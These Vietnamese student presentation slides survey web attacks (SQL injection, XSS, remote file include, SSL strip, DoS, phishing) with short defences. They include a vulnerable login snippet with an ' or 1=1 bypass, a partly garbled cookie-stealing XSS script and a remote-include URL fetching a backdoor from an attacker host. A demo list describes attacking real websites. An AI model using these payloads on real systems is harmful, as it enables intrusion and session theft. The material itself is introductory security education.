Tải bản đầy đủ (.ppt) (20 trang)

Tìm hiểu cách thức tấn công một website

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (922.6 KB, 20 trang )

NGHIÊN CỨU MỘT SỐ PHƯƠNG PHÁP
TẤN CÔNG WEB
10/2010
Giảng viên:
Sinh viên :
Mục lục
1. Động lực tấn công Web
2. Phân loại các hình thức tấn công web
3. Giới thiệu một số phương pháp tấn công web
4. Phát hiện và phòng chống
5. Demo
6. Kết quả đạt được và phương hướng phát
triển.
7. Lời cảm ơn.
1. Động lực tấn công Web

Tấn công gây rối loạn các mạng lưới điều hành.

Tấn công nhằm đánh cắp các thông tin quan trọng, tuyên
truyền tư tưởng phản động…

Tấn công vì sự thù ghét nhau, nhằm hạ bệ đối phương….

Tấn công vì sự tò mò của giới mới vào nghề.

Tấn công vì mục đích muốn kiếm tiền…
2. Phân loại các hình thức tấn công
Web

Tấn công web client


Tấn công firewall

Tấn công application
Web server

Tấn công web
platform

Tấn công Database
Mô hình chuẩn Web APP
2. Phân loại các hình thức tấn công
web
3. Giới thiệu một số phương pháp tấn
công web

SQL Injection

Cross site scripting

Remote file include

SSL strip Man-in-the-middle

DoS

Phising
3.1 SQL Injection

Thường xảy ra trên các ứng dụng web có csdl được quản lý bằng các hệ
cơ sở dữ liệu như SQL Server, Mysql, Oracle, DB2, Sysbase,

MsAccess…

Mỗi hệ quản trị csdl có một số điểm giống và khác nhau giữa các
phương pháp injection

SQL bypass

SQL injection
<% Dim vUsrName, vPassword, objRS, strSQL vUsrName =
Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")
strSQL = "SELECT * FROM T_USERS " & _"WHERE
USR_NAME=' " & vUsrName & _" ' and
USR_PASSWORD=' " & vPassword & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN= "
If (objRS.EOF) Then
Response.Write "Invalid login.“
Else
Response.Write "You are logged in as " &
objRS("USR_NAME")
End If
Set objRS = Nothing %>
Khi hacker nhập vào:
‘ or 1=1
SELECT * FROM T_USERS WHERE USR_NAME =''
OR 1=1 and USR_PASSWORD= '' OR 1=1
3.1 SQL Injection
Ngoài ra còn một số kĩ thuật nâng cao khác sử dụng SQL
injection như:


Union/Convert magic (khai thác dữ liệu)

Blind SQL injection

Tạo script Ddos sever

Nâng quyền user sử dụng xp_cmdshell

Upload backdoor
3.2 Cross site scripting

Cross site scripting viết tắt là XSS là một dạng tấn công hướng
về phía User (Client) mà ko tác động trực tiếp đến webserver

Hacker thường lợi dụng XSS để đánh cắp cookie của user,
phising …

Có 2 loại XSS chính :

Store – Cross site scripting

Reflect – Cross site scripting
3.2 Cross site scripting
<script>
window.location = ' +
document.cookie;
</script>
3.2 Cross site scripting
3.3 Remote File include


Là một lỗi thông dụng trong các ứng dụng web được viết bằng PHP

Có liên quan mật thiết đến phương pháp local attack

Lợi dụng sự bất cẩn của Programmer khi dùng hàm include() hay
require() trong PHP
<?
include(“$ex”);
?>
http://www.[target].com/test.php?ex=http://www.[attacker].com/backdoor.php
3.4 SSL strip

Hoạt động chính dựa theo cách thức tấn công Man-in-the-
middle.

Lợi dụng sự bất cẩn của người dùng.
3.4 DoS

Hacker tạo ra những script để post một cách tự động vào
forum, create member, search form, feedback
 Cạn kiệt tài nguyên server như BW, HDD, DB …

Dựa vào bug của service đang chạy trên server
3.5 Phising
Mục đích chủ yếu là lừa đảo,nhắm đến tài chính
Khó bị phát hiện do xuất phát từ địa chỉ không có thật
4. Phòng tránh

SQL injection :


Lọc các truy vấn bằng mod_security, URL_filter

Kiểm tra code lập trình

Cross site script / Remote file include

Kiểm tra code lập trình

Lọc nội dung input cũng như URL

SSL Strip

Nâng cao nhận thức người sử dụng

DNS security đang được phát triển

DoS

Sử dụng các chức năng xác thực bằng hình ảnh hoặc âm thanh

Phising

Sử dụng các công cụ phát hiện scam(ScamBlocker )

không nên nhấn vào link trực tiếp trong email
5. Demo

1, Tấn công fisopro.com.vn bằng lỗi trên bất cẩn của người lập
trình trên dịch vụ web + IIS 6.0


2, Remote file include

3, Cướp session của người dùng facebook

4, SSL strip với gmail.com

5, Buffer overflow IE 7

6, Tấn công sql injection

By pass

Tool

Thủ công
6. Kết quả đạt được và phương hướng
phát triển của đề tài.

Kết quả đạt được:

Hiểu thêm về các lỗ hổng trong Web

Demo được một số cách tấn công Web (sử dụng các website thật)

Tìm hiểu một số cách phòng tránh lại các kiểu tấn công như
(SQL injection, Phising, Dos…)

Phương hướng phát triển của đề tài:


Tìm hiểu thêm các tool để tấn công Web.

Viết được các tool tấn công Web từ đó đưa ra cách phòng tránh
kiểu tấn công đó.

Áp dụng những kiểu tấn công và các phương pháp phòng tránh
vào thực tế
7. Lời cảm ơn

Chúng em xin cảm ơn thầy Bùi Việt Thắng đã giúp đỡ chúng
em hoàn thành bài Nghiên cứu khoa học

Cảm ơn Học viện Kỹ Thuật Mật Mã đã tạo điều kiện cho
chúng em có cơ hội thực hiện đề tài khoa học này.

×